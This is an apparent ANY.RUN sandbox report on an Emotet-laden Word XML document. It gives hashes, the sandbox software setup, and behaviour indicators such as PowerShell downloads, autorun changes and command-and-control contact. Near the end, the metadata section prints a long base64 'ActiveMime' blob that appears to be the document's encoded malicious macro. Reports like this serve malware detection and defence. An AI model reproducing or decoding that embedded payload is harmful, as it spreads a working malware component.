Malware analysis 6220939475763.doc Malicious activity

analyze malware

Huge database of samples and IOCs
Custom VM setup
Unlimited submissions
Interactive approach

Add for printing

File name:	6220939475763.doc
Full analysis:	https://app.any.run/tasks/b9943d18-3a18-476b-a78c-89afb79ec48e
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	January 22, 2019, 17:19:52
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	loader trojan emotet feodo emotet-doc
Indicators:
MIME:	text/xml
File info:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:	8853997FE8C46705EDCC06E18E6D736F
SHA1:	27C8CFAC5161D7E9BA0D15F723ECFAC8B8E8EBA8
SHA256:	1A68B45AF1EB91D9DDC3D5BFDF29EEEDA46C098BDDD550485494B82DD4225884
SSDEEP:	3072:xzRWs9T4+SojL/xSu90OoiLuDKZXfwKeljR1z:xb9MJexUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 180 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 120 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (68.0.3440.106)
Google Update Helper (1.3.33.17)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Starts CMD.EXE for commands execution
  - WINWORD.EXE (PID: 2808)
- Unusual execution from Microsoft Office
  - WINWORD.EXE (PID: 2808)
- Executes PowerShell scripts
  - cmd.exe (PID: 3548)
- Application was dropped or rewritten from another process
  - 643.exe (PID: 2888)
  - 643.exe (PID: 2184)
  - wabmetagen.exe (PID: 460)
  - wabmetagen.exe (PID: 2680)
- Runs app for hidden code execution
  - cmd.exe (PID: 1644)
- Downloads executable files from the Internet
  - powershell.exe (PID: 3792)
- Request from PowerShell which ran from CMD.EXE
  - powershell.exe (PID: 3792)
- Changes the autorun value in the registry
  - wabmetagen.exe (PID: 2680)
- EMOTET was detected
  - wabmetagen.exe (PID: 2680)
- Connects to CnC server
  - wabmetagen.exe (PID: 2680)
SUSPICIOUS
- Application launched itself
  - cmd.exe (PID: 3968)
  - cmd.exe (PID: 1644)
  - cmd.exe (PID: 2504)
- Starts CMD.EXE for commands execution
  - cmd.exe (PID: 1644)
  - cmd.exe (PID: 3968)
  - cmd.exe (PID: 2464)
  - cmd.exe (PID: 2504)
- Creates files in the user directory
  - powershell.exe (PID: 3792)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 3792)
  - 643.exe (PID: 2184)
- Starts itself from another location
  - 643.exe (PID: 2184)
- Connects to unusual port
  - wabmetagen.exe (PID: 2680)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 2808)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 2808)
- Dropped object may contain Bitcoin addresses
  - powershell.exe (PID: 3792)
  - 643.exe (PID: 2184)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.xml	\|	Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml	\|	Microsoft Office XML Flat File Format (ASCII) (31)
.xml	\|	Generic XML (ASCII) (2.3)
.html	\|	HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch:	360
WordDocumentBodySectSectPrColsSpace:	720
WordDocumentBodySectSectPrPgMarGutter:	-
WordDocumentBodySectSectPrPgMarFooter:	720
WordDocumentBodySectSectPrPgMarHeader:	720
WordDocumentBodySectSectPrPgMarLeft:	1440
WordDocumentBodySectSectPrPgMarBottom:	1440
WordDocumentBodySectSectPrPgMarRight:	1440
WordDocumentBodySectSectPrPgMarTop:	1440
WordDocumentBodySectSectPrPgSzH:	15840
WordDocumentBodySectSectPrPgSzW:	12240
WordDocumentBodySectSectPrRsidR:	005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle:	-
WordDocumentBodySectPRPictShapeImagedataSrc:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle:	width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType:	#_x0000_t75
WordDocumentBodySectPRPictShapeSpid:	_x0000_i1025
WordDocumentBodySectPRPictShapeId:	Picture 1
WordDocumentBodySectPRPictBinData:	(Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio:	t
WordDocumentBodySectPRPictShapetypeLockExt:	edit
WordDocumentBodySectPRPictShapetypePathConnecttype:	rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok:	t
WordDocumentBodySectPRPictShapetypePathExtrusionok:	f
WordDocumentBodySectPRPictShapetypeFormulasFEqn:	if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle:	miter
WordDocumentBodySectPRPictShapetypeStroked:	f
WordDocumentBodySectPRPictShapetypeFilled:	f
WordDocumentBodySectPRPictShapetypePath:	m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative:	t
WordDocumentBodySectPRPictShapetypeSpt:	75
WordDocumentBodySectPRPictShapetypeCoordsize:	21600,21600
WordDocumentBodySectPRPictShapetypeId:	_x0000_t75
WordDocumentBodySectPRRPrNoProof:	-
WordDocumentBodySectPRRsidRPr:	000473DE
WordDocumentBodySectPRsidRDefault:	00DF7DB8
WordDocumentBodySectPRsidR:	005E6EE1
WordDocumentDocPrRsidsRsidVal:	005A24B1
WordDocumentDocPrRsidsRsidRootVal:	005E6EE1
WordDocumentDocPrCompatDontGrowAutofit:	-
WordDocumentDocPrCompatUseAsianBreakRules:	-
WordDocumentDocPrCompatWrapTextWithPunct:	-
WordDocumentDocPrCompatSnapToGridInCell:	-
WordDocumentDocPrCompatBreakWrappedTables:	-
WordDocumentDocPrAlwaysShowPlaceholderTextVal:	off
WordDocumentDocPrIgnoreMixedContentVal:	off
WordDocumentDocPrSaveInvalidXMLVal:	off
WordDocumentDocPrValidateAgainstSchema:	-
WordDocumentDocPrPixelsPerInchVal:	120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile:	-
WordDocumentDocPrOptimizeForBrowser:	-
WordDocumentDocPrCharacterSpacingControlVal:	DontCompress
WordDocumentDocPrPunctuationKerning:	-
WordDocumentDocPrDefaultTabStopVal:	720
WordDocumentDocPrDoNotEmbedSystemFonts:	-
WordDocumentDocPrRemovePersonalInformation:	-
WordDocumentDocPrZoomPercent:	100
WordDocumentDocPrViewVal:	print
WordDocumentShapeDefaultsShapelayoutIdmapData:	1
WordDocumentShapeDefaultsShapelayoutIdmapExt:	edit
WordDocumentShapeDefaultsShapelayoutExt:	edit
WordDocumentShapeDefaultsShapedefaultsSpidmax:	1026
WordDocumentShapeDefaultsShapedefaultsExt:	edit
WordDocumentDocSuppDataBinData:	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 